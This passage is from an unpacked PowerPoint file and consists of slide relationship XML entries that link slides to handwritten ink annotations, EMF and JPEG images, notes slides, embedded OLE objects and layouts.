Target="../ink/ink193.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image158.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image162.emf"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink206.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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220.emf"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink219.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1660.emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image170.emf"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink232.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image174.emf"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink236.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink240.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink212.xml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1170.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink223.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink214.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1211.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1651.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink227.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1692.emf"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink231.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink235.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image178.emf"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image182.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink211.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink239.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink218.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1160.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1200.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink222.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1641.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink226.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink230.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image173.emf"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.emf"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image181.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1130.emf"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink234.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink210.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1150.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink217.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink221.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink225.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1682.emf"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image172.emf"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink238.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1190.emf"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink229.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image176.emf"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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0.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink216.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink220.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1232.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1672.emf"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink233.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink237.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1140.emf"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink224.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image171.emf"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image175.emf"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image179.emf"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink241.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1111.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink213.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink215.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1180.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink22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customXml" Target="../ink/ink244.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1732.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink249.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1771.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1691.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink246.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1751.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide32.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink248.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink25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43.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1711.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1681.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1743.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink245.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1762.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink242.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1701.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink247.xml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55.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1271.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1312.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink267.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink259.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1501.emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1811.emf"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink271.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image185.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink252.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide33.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1261.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink254.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1301.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1341.emf"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1802.emf"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink270.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink256.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink260.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1322.emf"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink272.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4810.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink258.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink264.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1822.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink253.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1291.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink262.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1332.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink266.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink269.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image184.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4710.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink251.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image761.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink257.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink261.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink265.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1782.emf"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image183.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1281.emf"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink26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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink278.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink273.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink275.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1300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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink277.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink274.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1290.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1260.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink276.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink284.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1411.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink279.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink281.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1380.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink286.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide37.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink283.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink280.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink285.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1370.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1340.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink282.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1390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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1440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287.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1450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91.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1511.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink296.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1480.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink293.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1731.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide39.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink29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90.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1500.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1470.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1721.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink292.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1742.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink289.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1490.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink29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3.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject2.bin"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.emf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6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.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.emf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide4.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject4.bin"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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2.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink297.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink299.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image186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32.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink301.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink298.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1853.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1750.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink30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590.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink309.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink313.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1720.emf"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1630.emf"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink316.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink320.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1560.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide46.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink308.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink310.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1670.emf"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1730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3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1580.emf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink312.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink315.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.emf"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink319.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1550.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1600.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1640.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink317.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink305.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1620.emf"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1680.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink302.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1570.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink307.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink311.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink314.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1700.emf"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1801.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink304.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink306.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.emf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1650.emf"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1690.emf"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink31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customXml" Target="../ink/ink322.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1831.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink327.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1760.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink324.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1852.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide47.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink326.xml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1821.emf"/><Relationship Id="rId15" 